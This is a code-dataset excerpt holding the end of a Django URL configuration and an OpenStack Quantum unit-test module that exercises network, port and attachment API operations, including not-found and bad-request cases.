https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
url(r'^', include('authorization.urls')),
url(r'^polls/', include('polls.urls')),
url(r'^data/', include('data.urls')),
url(r'^admin/', admin.site.urls),
url(r'^oauth/', include('social_django.urls', namespace='social')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
xchenum/quantum | refs/heads/master | quantum/tests/unit/_test_api.py | 3 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010-2011 ????
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Brad Hall, Nicira Networks
# @author: Salvatore Orlando, Citrix Systems
import logging
import unittest2 as unittest
import mock
import os
from quantum.api.api_common import APIFaultWrapper
from quantum.api.networks import Controller
from quantum.common import config
from quantum.common.test_lib import test_config
from quantum.db import api as db
from quantum.openstack.common import cfg
from quantum.openstack.common import importutils
import quantum.tests.unit.testlib_api as testlib
from quantum.wsgi import XMLDeserializer, JSONDeserializer
LOG = logging.getLogger('quantum.tests.test_api')
ROOTDIR = os.path.dirname(os.path.dirname(__file__))
ETCDIR = os.path.join(ROOTDIR, 'etc')
def etcdir(*p):
return os.path.join(ETCDIR, *p)
NETS = "networks"
PORTS = "ports"
ATTS = "attachments"
class AbstractAPITest(unittest.TestCase):
""" Base class definiting some methods for API tests """
def _deserialize_net_response(self, content_type, response):
network_data = (self._net_deserializers[content_type].
deserialize(response.body)['body'])
# do not taint assertions with xml namespace
if 'xmlns' in network_data['network']:
del network_data['network']['xmlns']
return network_data
def _deserialize_port_response(self, content_type, response):
port_data = (self._port_deserializers[content_type].
deserialize(response.body)['body'])
# do not taint assertions with xml namespace
if 'xmlns' in port_data['port']:
del port_data['port']['xmlns']
return port_data
def _create_network(self, fmt, name=None, custom_req_body=None,
expected_res_status=None):
LOG.debug("Creating network")
content_type = "application/" + fmt
if name:
net_name = name
else:
net_name = self.network_name
network_req = testlib.new_network_request(self.tenant_id,
net_name, fmt,
custom_req_body)
network_res = network_req.get_response(self.api)
expected_res_status = (expected_res_status or
self._successful_create_code)
self.assertEqual(network_res.status_int, expected_res_status)
if expected_res_status in (200, 202):
network_data = self._deserialize_net_response(content_type,
network_res)
return network_data['network']['id']
def _create_port(self, network_id, port_state, fmt, custom_req_body=None,
expected_res_status=None):
LOG.debug("Creating port for network %s", network_id)
content_type = "application/%s" % fmt
port_req = testlib.new_port_request(self.tenant_id, network_id,
port_state, fmt,
custom_req_body)
port_res = port_req.get_response(self.api)
expected_res_status = (expected_res_status or
self._successful_create_code)
self.assertEqual(port_res.status_int, expected_res_status)
if expected_res_status in (200, 202):
port_data = self._deserialize_port_response(content_type,
port_res)
return port_data['port']['id']
def _set_attachment(self, network_id, port_id, interface_id, fmt,
expected_res_status=204):
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int, expected_res_status)
def setUp(self, api_router_klass, xml_metadata_dict):
# Create the default configurations
args = ['--config-file', etcdir('quantum.conf.test')]
config.parse(args=args)
# Update the plugin
cfg.CONF.set_override('core_plugin', test_config['plugin_name'])
api_router_cls = importutils.import_class(api_router_klass)
self.api = api_router_cls()
self.tenant_id = "test_tenant"
self.network_name = "test_network"
# Prepare XML & JSON deserializers
net_xml_deserializer = XMLDeserializer(xml_metadata_dict[NETS])
port_xml_deserializer = XMLDeserializer(xml_metadata_dict[PORTS])
att_xml_deserializer = XMLDeserializer(xml_metadata_dict[ATTS])
json_deserializer = JSONDeserializer()
self._net_deserializers = {
'application/xml': net_xml_deserializer,
'application/json': json_deserializer,
}
self._port_deserializers = {
'application/xml': port_xml_deserializer,
'application/json': json_deserializer,
}
self._att_deserializers = {
'application/xml': att_xml_deserializer,
'application/json': json_deserializer,
}
def tearDown(self):
"""Clear the test environment"""
# Remove database contents
db.clear_db()
cfg.CONF.reset()
class BaseAPIOperationsTest(AbstractAPITest):
"""Abstract base class for Quantum API unit tests
Defined according to the operations specified for Quantum API v1.0
"""
def _test_create_network(self, fmt):
LOG.debug("_test_create_network - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
network_id = self._create_network(fmt)
show_network_req = testlib.show_network_request(self.tenant_id,
network_id,
fmt)
show_network_res = show_network_req.get_response(self.api)
self.assertEqual(show_network_res.status_int, 200)
network_data = (self._net_deserializers[content_type].
deserialize(show_network_res.body)['body'])
self.assertEqual(network_id, network_data['network']['id'])
LOG.debug("_test_create_network - fmt:%s - END", fmt)
def _test_create_network_badrequest(self, fmt):
LOG.debug("_test_create_network_badrequest - fmt:%s - START", fmt)
bad_body = {'network': {'bad-attribute': 'very-bad'}}
self._create_network(fmt, custom_req_body=bad_body,
expected_res_status=400)
LOG.debug("_test_create_network_badrequest - fmt:%s - END", fmt)
def _test_list_networks(self, fmt):
LOG.debug("_test_list_networks - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
self._create_network(fmt, "net_1")
self._create_network(fmt, "net_2")
list_network_req = testlib.network_list_request(self.tenant_id,
fmt)
list_network_res = list_network_req.get_response(self.api)
self.assertEqual(list_network_res.status_int, 200)
network_data = (self._net_deserializers[content_type].
deserialize(list_network_res.body)['body'])
# Check network count: should return 2
self.assertEqual(len(network_data['networks']), 2)
LOG.debug("_test_list_networks - fmt:%s - END", fmt)
def _test_list_networks_detail(self, fmt):
LOG.debug("_test_list_networks_detail - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
self._create_network(fmt, "net_1")
self._create_network(fmt, "net_2")
list_network_req = testlib.network_list_detail_request(self.tenant_id,
fmt)
list_network_res = list_network_req.get_response(self.api)
self.assertEqual(list_network_res.status_int, 200)
network_data = (self._net_deserializers[content_type].
deserialize(list_network_res.body)['body'])
# Check network count: should return 2
self.assertEqual(len(network_data['networks']), 2)
# Check contents - id & name for each network
for network in network_data['networks']:
self.assertTrue('id' in network and 'name' in network)
self.assertTrue(network['id'] and network['name'])
LOG.debug("_test_list_networks_detail - fmt:%s - END", fmt)
def _test_show_network(self, fmt):
LOG.debug("_test_show_network - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
network_id = self._create_network(fmt)
show_network_req = testlib.show_network_request(self.tenant_id,
network_id,
fmt)
show_network_res = show_network_req.get_response(self.api)
self.assertEqual(show_network_res.status_int, 200)
network_data = self._deserialize_net_response(content_type,
show_network_res)
self.assert_network(id=network_id, name=self.network_name,
network_data=network_data['network'])
LOG.debug("_test_show_network - fmt:%s - END", fmt)
def _test_show_network_detail(self, fmt):
LOG.debug("_test_show_network_detail - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
# Create a network and a port
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, "ACTIVE", fmt)
show_network_req = testlib.show_network_detail_request(self.tenant_id,
network_id,
fmt)
show_network_res = show_network_req.get_response(self.api)
self.assertEqual(show_network_res.status_int, 200)
network_data = self._deserialize_net_response(content_type,
show_network_res)
self.assert_network_details(id=network_id, name=self.network_name,
port_id=port_id, port_state='ACTIVE',
network_data=network_data['network'])
LOG.debug("_test_show_network_detail - fmt:%s - END", fmt)
def _test_show_network_not_found(self, fmt):
LOG.debug("_test_show_network_not_found - fmt:%s - START", fmt)
show_network_req = testlib.show_network_request(self.tenant_id,
"A_BAD_ID",
fmt)
show_network_res = show_network_req.get_response(self.api)
self.assertEqual(show_network_res.status_int,
self._network_not_found_code)
LOG.debug("_test_show_network_not_found - fmt:%s - END", fmt)
def _test_rename_network(self, fmt):
LOG.debug("_test_rename_network - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
new_name = 'new_network_name'
network_id = self._create_network(fmt)
update_network_req = testlib.update_network_request(self.tenant_id,
network_id,
new_name,
fmt)
update_network_res = update_network_req.get_response(self.api)
self.assertEqual(update_network_res.status_int, 204)
show_network_req = testlib.show_network_request(self.tenant_id,
network_id,
fmt)
show_network_res = show_network_req.get_response(self.api)
self.assertEqual(show_network_res.status_int, 200)
network_data = self._deserialize_net_response(content_type,
show_network_res)
self.assert_network(id=network_id, name=new_name,
network_data=network_data['network'])
LOG.debug("_test_rename_network - fmt:%s - END", fmt)
def _test_rename_network_badrequest(self, fmt):
LOG.debug("_test_rename_network_badrequest - fmt:%s - START", fmt)
network_id = self._create_network(fmt)
bad_body = {'network': {'bad-attribute': 'very-bad'}}
update_network_req = testlib.update_network_request(
self.tenant_id,
network_id, fmt,
custom_req_body=bad_body)
update_network_res = update_network_req.get_response(self.api)
self.assertEqual(update_network_res.status_int, 400)
LOG.debug("_test_rename_network_badrequest - fmt:%s - END", fmt)
def _test_rename_network_not_found(self, fmt):
LOG.debug("_test_rename_network_not_found - fmt:%s - START", fmt)
new_name = 'new_network_name'
update_network_req = testlib.update_network_request(self.tenant_id,
"A BAD ID",
new_name,
fmt)
update_network_res = update_network_req.get_response(self.api)
self.assertEqual(update_network_res.status_int,
self._network_not_found_code)
LOG.debug("_test_rename_network_not_found - fmt:%s - END", fmt)
def _test_delete_network(self, fmt):
LOG.debug("_test_delete_network - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
network_id = self._create_network(fmt)
LOG.debug("Deleting network %s of tenant %s" %
(network_id, self.tenant_id))
delete_network_req = testlib.network_delete_request(self.tenant_id,
network_id,
fmt)
delete_network_res = delete_network_req.get_response(self.api)
self.assertEqual(delete_network_res.status_int, 204)
list_network_req = testlib.network_list_request(self.tenant_id,
fmt)
list_network_res = list_network_req.get_response(self.api)
network_list_data = (self._net_deserializers[content_type].
deserialize(list_network_res.body)['body'])
network_count = len(network_list_data['networks'])
self.assertEqual(network_count, 0)
LOG.debug("_test_delete_network - fmt:%s - END", fmt)
def _test_delete_network_in_use(self, fmt):
LOG.debug("_test_delete_network_in_use - fmt:%s - START", fmt)
port_state = "ACTIVE"
attachment_id = "test_attachment"
network_id = self._create_network(fmt)
LOG.debug("Deleting network %s of tenant %s" %
(network_id, self.tenant_id))
port_id = self._create_port(network_id, port_state, fmt)
#plug an attachment into the port
LOG.debug("Putting attachment into port %s", port_id)
attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
attachment_id)
attachment_res = attachment_req.get_response(self.api)
self.assertEquals(attachment_res.status_int, 204)
LOG.debug("Deleting network %s of tenant %s" %
(network_id, self.tenant_id))
delete_network_req = testlib.network_delete_request(self.tenant_id,
network_id,
fmt)
delete_network_res = delete_network_req.get_response(self.api)
self.assertEqual(delete_network_res.status_int,
self._network_in_use_code)
LOG.debug("_test_delete_network_in_use - fmt:%s - END", fmt)
def _test_delete_network_with_unattached_port(self, fmt):
LOG.debug("_test_delete_network_with_unattached_port "
"- fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
LOG.debug("Deleting network %s of tenant %s" %
(network_id, self.tenant_id))
self._create_port(network_id, port_state, fmt)
LOG.debug("Deleting network %s of tenant %s" %
(network_id, self.tenant_id))
delete_network_req = testlib.network_delete_request(self.tenant_id,
network_id,
fmt)
delete_network_res = delete_network_req.get_response(self.api)
self.assertEqual(delete_network_res.status_int, 204)
LOG.debug("_test_delete_network_with_unattached_port - fmt:%s - END",
fmt)
def _test_list_ports(self, fmt):
LOG.debug("_test_list_ports - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
self._create_port(network_id, port_state, fmt)
list_port_req = testlib.port_list_request(self.tenant_id,
network_id, fmt)
list_port_res = list_port_req.get_response(self.api)
self.assertEqual(list_port_res.status_int, 200)
port_data = (self._port_deserializers[content_type].
deserialize(list_port_res.body)['body'])
# Check port count: should return 2
self.assertEqual(len(port_data['ports']), 2)
LOG.debug("_test_list_ports - fmt:%s - END", fmt)
def _test_list_ports_networknotfound(self, fmt):
LOG.debug("_test_list_ports_networknotfound"
" - fmt:%s - START", fmt)
list_port_req = testlib.port_list_request(self.tenant_id,
"A_BAD_ID", fmt)
list_port_res = list_port_req.get_response(self.api)
self.assertEqual(list_port_res.status_int,
self._network_not_found_code)
LOG.debug("_test_list_ports_networknotfound - fmt:%s - END", fmt)
def _test_list_ports_detail(self, fmt):
LOG.debug("_test_list_ports_detail - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
self._create_port(network_id, port_state, fmt)
list_port_req = testlib.port_list_detail_request(self.tenant_id,
network_id, fmt)
list_port_res = list_port_req.get_response(self.api)
self.assertEqual(list_port_res.status_int, 200)
port_data = (self._port_deserializers[content_type].
deserialize(list_port_res.body)['body'])
# Check port count: should return 2
self.assertEqual(len(port_data['ports']), 2)
# Check contents - id & state for each port
for port in port_data['ports']:
self.assertTrue('id' in port and 'state' in port)
self.assertTrue(port['id'] and port['state'])
LOG.debug("_test_list_ports_detail - fmt:%s - END", fmt)
def _test_show_port(self, fmt):
LOG.debug("_test_show_port - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
show_port_req = testlib.show_port_request(self.tenant_id,
network_id, port_id,
fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = self._deserialize_port_response(content_type,
show_port_res)
self.assert_port(id=port_id, state=port_state,
port_data=port_data['port'])
LOG.debug("_test_show_port - fmt:%s - END", fmt)
def _test_show_port_detail(self, fmt):
LOG.debug("_test_show_port - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
# Part 1 - no attachment
show_port_req = testlib.show_port_detail_request(
self.tenant_id, network_id, port_id, fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = self._deserialize_port_response(content_type,
show_port_res)
self.assert_port(id=port_id, state=port_state,
port_data=port_data['port'])
# Part 2 - plug attachment into port
interface_id = "test_interface"
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int, 204)
show_port_req = testlib.show_port_detail_request(
self.tenant_id, network_id, port_id, fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = self._deserialize_port_response(content_type,
show_port_res)
self.assert_port_attachment(id=port_id, state=port_state,
interface_id=interface_id,
port_data=port_data['port'])
LOG.debug("_test_show_port_detail - fmt:%s - END", fmt)
def _test_show_port_networknotfound(self, fmt):
LOG.debug("_test_show_port_networknotfound - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
show_port_req = testlib.show_port_request(self.tenant_id,
"A_BAD_ID", port_id,
fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int,
self._network_not_found_code)
LOG.debug("_test_show_port_networknotfound - fmt:%s - END", fmt)
def _test_show_port_portnotfound(self, fmt):
LOG.debug("_test_show_port_portnotfound - fmt:%s - START", fmt)
network_id = self._create_network(fmt)
show_port_req = testlib.show_port_request(self.tenant_id,
network_id,
"A_BAD_ID",
fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int,
self._port_not_found_code)
LOG.debug("_test_show_port_portnotfound - fmt:%s - END", fmt)
def _test_create_port_noreqbody(self, fmt):
LOG.debug("_test_create_port_noreqbody - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, None, fmt,
custom_req_body='')
show_port_req = testlib.show_port_request(self.tenant_id,
network_id, port_id, fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = (self._port_deserializers[content_type].
deserialize(show_port_res.body)['body'])
self.assertEqual(port_id, port_data['port']['id'])
LOG.debug("_test_create_port_noreqbody - fmt:%s - END", fmt)
def _test_create_port(self, fmt):
LOG.debug("_test_create_port - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
show_port_req = testlib.show_port_request(self.tenant_id,
network_id, port_id, fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = (self._port_deserializers[content_type].
deserialize(show_port_res.body)['body'])
self.assertEqual(port_id, port_data['port']['id'])
LOG.debug("_test_create_port - fmt:%s - END", fmt)
def _test_create_port_networknotfound(self, fmt):
LOG.debug("_test_create_port_networknotfound - fmt:%s - START", fmt)
port_state = "ACTIVE"
self._create_port("A_BAD_ID", port_state, fmt,
expected_res_status=self._network_not_found_code)
LOG.debug("_test_create_port_networknotfound - fmt:%s - END", fmt)
def _test_create_port_badrequest(self, fmt):
LOG.debug("_test_create_port_badrequest - fmt:%s - START", fmt)
bad_body = {'bad-resource': {'bad-attribute': 'bad-value'}}
network_id = self._create_network(fmt)
port_state = "ACTIVE"
self._create_port(network_id, port_state, fmt,
custom_req_body=bad_body, expected_res_status=400)
LOG.debug("_test_create_port_badrequest - fmt:%s - END", fmt)
def _test_create_port_badportstate(self, fmt):
LOG.debug("_test_create_port_badportstate - fmt:%s - START", fmt)
network_id = self._create_network(fmt)
port_state = "BADSTATE"
self._create_port(network_id, port_state, fmt,
expected_res_status=self._port_state_invalid_code)
LOG.debug("_test_create_port_badportstate - fmt:%s - END", fmt)
def _test_delete_port(self, fmt):
LOG.debug("_test_delete_port - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
LOG.debug("Deleting port %s for network %s of tenant %s" %
(port_id, network_id, self.tenant_id))
delete_port_req = testlib.port_delete_request(self.tenant_id,
network_id, port_id,
fmt)
delete_port_res = delete_port_req.get_response(self.api)
self.assertEqual(delete_port_res.status_int, 204)
list_port_req = testlib.port_list_request(self.tenant_id, network_id,
fmt)
list_port_res = list_port_req.get_response(self.api)
port_list_data = (self._port_deserializers[content_type].
deserialize(list_port_res.body)['body'])
port_count = len(port_list_data['ports'])
self.assertEqual(port_count, 0)
LOG.debug("_test_delete_port - fmt:%s - END", fmt)
def _test_delete_port_in_use(self, fmt):
LOG.debug("_test_delete_port_in_use - fmt:%s - START", fmt)
port_state = "ACTIVE"
attachment_id = "test_attachment"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
#plug an attachment into the port
LOG.debug("Putting attachment into port %s", port_id)
attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
attachment_id)
attachment_res = attachment_req.get_response(self.api)
self.assertEquals(attachment_res.status_int, 204)
LOG.debug("Deleting port %s for network %s of tenant %s" %
(port_id, network_id, self.tenant_id))
delete_port_req = testlib.port_delete_request(self.tenant_id,
network_id, port_id,
fmt)
delete_port_res = delete_port_req.get_response(self.api)
self.assertEqual(delete_port_res.status_int,
self._port_in_use_code)
LOG.debug("_test_delete_port_in_use - fmt:%s - END", fmt)
def _test_delete_port_with_bad_id(self, fmt):
LOG.debug("_test_delete_port_with_bad_id - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
# Test for portnotfound
delete_port_req = testlib.port_delete_request(self.tenant_id,
network_id, "A_BAD_ID",
fmt)
delete_port_res = delete_port_req.get_response(self.api)
self.assertEqual(delete_port_res.status_int,
self._port_not_found_code)
LOG.debug("_test_delete_port_with_bad_id - fmt:%s - END", fmt)
def _test_delete_port_networknotfound(self, fmt):
LOG.debug("_test_delete_port_networknotfound - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
delete_port_req = testlib.port_delete_request(self.tenant_id,
"A_BAD_ID", port_id,
fmt)
delete_port_res = delete_port_req.get_response(self.api)
self.assertEqual(delete_port_res.status_int,
self._network_not_found_code)
LOG.debug("_test_delete_port_networknotfound - fmt:%s - END", fmt)
def _test_set_port_state(self, fmt):
LOG.debug("_test_set_port_state - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = 'DOWN'
new_port_state = 'ACTIVE'
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
update_port_req = testlib.update_port_request(self.tenant_id,
network_id, port_id,
new_port_state,
fmt)
update_port_res = update_port_req.get_response(self.api)
self.assertEqual(update_port_res.status_int, 204)
show_port_req = testlib.show_port_request(self.tenant_id,
network_id, port_id,
fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = self._deserialize_port_response(content_type,
show_port_res)
self.assert_port(id=port_id, state=new_port_state,
port_data=port_data['port'])
# now set it back to the original value
update_port_req = testlib.update_port_request(self.tenant_id,
network_id, port_id,
port_state,
fmt)
update_port_res = update_port_req.get_response(self.api)
self.assertEqual(update_port_res.status_int, 204)
show_port_req = testlib.show_port_request(self.tenant_id,
network_id, port_id,
fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = self._deserialize_port_response(content_type,
show_port_res)
self.assert_port(id=port_id, state=port_state,
port_data=port_data['port'])
LOG.debug("_test_set_port_state - fmt:%s - END", fmt)
def _test_set_port_state_networknotfound(self, fmt):
LOG.debug("_test_set_port_state_networknotfound - fmt:%s - START", fmt)
port_state = 'DOWN'
new_port_state = 'ACTIVE'
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
update_port_req = testlib.update_port_request(self.tenant_id,
"A_BAD_ID", port_id,
new_port_state,
fmt)
update_port_res = update_port_req.get_response(self.api)
self.assertEqual(update_port_res.status_int,
self._network_not_found_code)
LOG.debug("_test_set_port_state_networknotfound - fmt:%s - END", fmt)
def _test_set_port_state_portnotfound(self, fmt):
LOG.debug("_test_set_port_state_portnotfound - fmt:%s - START", fmt)
port_state = 'DOWN'
new_port_state = 'ACTIVE'
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
update_port_req = testlib.update_port_request(self.tenant_id,
network_id,
"A_BAD_ID",
new_port_state,
fmt)
update_port_res = update_port_req.get_response(self.api)
self.assertEqual(update_port_res.status_int,
self._port_not_found_code)
LOG.debug("_test_set_port_state_portnotfound - fmt:%s - END", fmt)
def _test_set_port_state_stateinvalid(self, fmt):
LOG.debug("_test_set_port_state_stateinvalid - fmt:%s - START", fmt)
port_state = 'DOWN'
new_port_state = 'A_BAD_STATE'
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
update_port_req = testlib.update_port_request(self.tenant_id,
network_id, port_id,
new_port_state,
fmt)
update_port_res = update_port_req.get_response(self.api)
self.assertEqual(update_port_res.status_int,
self._port_state_invalid_code)
LOG.debug("_test_set_port_state_stateinvalid - fmt:%s - END", fmt)
def _test_show_attachment(self, fmt):
LOG.debug("_test_show_attachment - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
interface_id = "test_interface"
port_id = self._create_port(network_id, port_state, fmt)
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int, 204)
get_attachment_req = testlib.get_attachment_request(self.tenant_id,
network_id,
port_id,
fmt)
get_attachment_res = get_attachment_req.get_response(self.api)
attachment_data = (self._att_deserializers[content_type].
deserialize(get_attachment_res.body)['body'])
self.assertEqual(attachment_data['attachment']['id'], interface_id)
LOG.debug("_test_show_attachment - fmt:%s - END", fmt)
def _test_show_attachment_none_set(self, fmt):
LOG.debug("_test_show_attachment_none_set - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
get_attachment_req = testlib.get_attachment_request(self.tenant_id,
network_id,
port_id,
fmt)
get_attachment_res = get_attachment_req.get_response(self.api)
attachment_data = (self._att_deserializers[content_type].
deserialize(get_attachment_res.body)['body'])
self.assertTrue('id' not in attachment_data['attachment'])
LOG.debug("_test_show_attachment_none_set - fmt:%s - END", fmt)
def _test_show_attachment_networknotfound(self, fmt):
LOG.debug("_test_show_attachment_networknotfound - fmt:%s - START",
fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
get_attachment_req = testlib.get_attachment_request(self.tenant_id,
"A_BAD_ID",
port_id,
fmt)
get_attachment_res = get_attachment_req.get_response(self.api)
self.assertEqual(get_attachment_res.status_int,
self._network_not_found_code)
LOG.debug("_test_show_attachment_networknotfound - fmt:%s - END", fmt)
def _test_show_attachment_portnotfound(self, fmt):
LOG.debug("_test_show_attachment_portnotfound - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
get_attachment_req = testlib.get_attachment_request(self.tenant_id,
network_id,
"A_BAD_ID",
fmt)
get_attachment_res = get_attachment_req.get_response(self.api)
self.assertEqual(get_attachment_res.status_int,
self._port_not_found_code)
LOG.debug("_test_show_attachment_portnotfound - fmt:%s - END", fmt)
def _test_put_attachment(self, fmt):
LOG.debug("_test_put_attachment - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
interface_id = "test_interface"
port_id = self._create_port(network_id, port_state, fmt)
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int, 204)
LOG.debug("_test_put_attachment - fmt:%s - END", fmt)
def _test_put_attachment_networknotfound(self, fmt):
LOG.debug("_test_put_attachment_networknotfound - fmt:%s - START", fmt)
port_state = 'DOWN'
interface_id = "test_interface"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
"A_BAD_ID",
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int,
self._network_not_found_code)
LOG.debug("_test_put_attachment_networknotfound - fmt:%s - END", fmt)
def _test_put_attachment_portnotfound(self, fmt):
LOG.debug("_test_put_attachment_portnotfound - fmt:%s - START", fmt)
port_state = 'DOWN'
interface_id = "test_interface"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
"A_BAD_ID",
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int,
self._port_not_found_code)
LOG.debug("_test_put_attachment_portnotfound - fmt:%s - END", fmt)
def _test_delete_attachment(self, fmt):
LOG.debug("_test_delete_attachment - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
interface_id = "test_interface"
port_id = self._create_port(network_id, port_state, fmt)
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int, 204)
del_attachment_req = testlib.delete_attachment_request(self.tenant_id,
network_id,
port_id,
fmt)
del_attachment_res = del_attachment_req.get_response(self.api)
self.assertEqual(del_attachment_res.status_int, 204)
LOG.debug("_test_delete_attachment - fmt:%s - END", fmt)
def _test_delete_attachment_networknotfound(self, fmt):
LOG.debug("_test_delete_attachment_networknotfound - fmt:%s - START",
fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
del_attachment_req = testlib.delete_attachment_request(self.tenant_id,
"A_BAD_ID",
port_id,
fmt)
del_attachment_res = del_attachment_req.get_response(self.api)
self.assertEqual(del_attachment_res.status_int,
self._network_not_found_code)
LOG.debug("_test_delete_attachment_networknotfound - fmt:%s - END",
fmt)
def _test_delete_attachment_portnotfound(self, fmt):
LOG.debug("_test_delete_attachment_portnotfound - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
del_attachment_req = testlib.delete_attachment_request(self.tenant_id,
network_id,
"A_BAD_ID",
fmt)
del_attachment_res = del_attachment_req.get_response(self.api)
self.assertEqual(del_attachment_res.status_int,
self._port_not_found_code)
LOG.debug("_test_delete_attachment_portnotfound - fmt:%s - END", fmt)
def _test_unparsable_data(self, fmt):
LOG.debug("_test_unparsable_data - fmt:%s - START", fmt)
data = "this is not json or xml"
method = 'POST'
content_type = "application/%s" % fmt
tenant_id = self.tenant_id
path = "/tenants/%(tenant_id)s/networks.%(fmt)s" % locals()
network_req = testlib.create_request(path, data, content_type, method)
network_res = network_req.get_response(self.api)
self.assertEqual(network_res.status_int, 400)
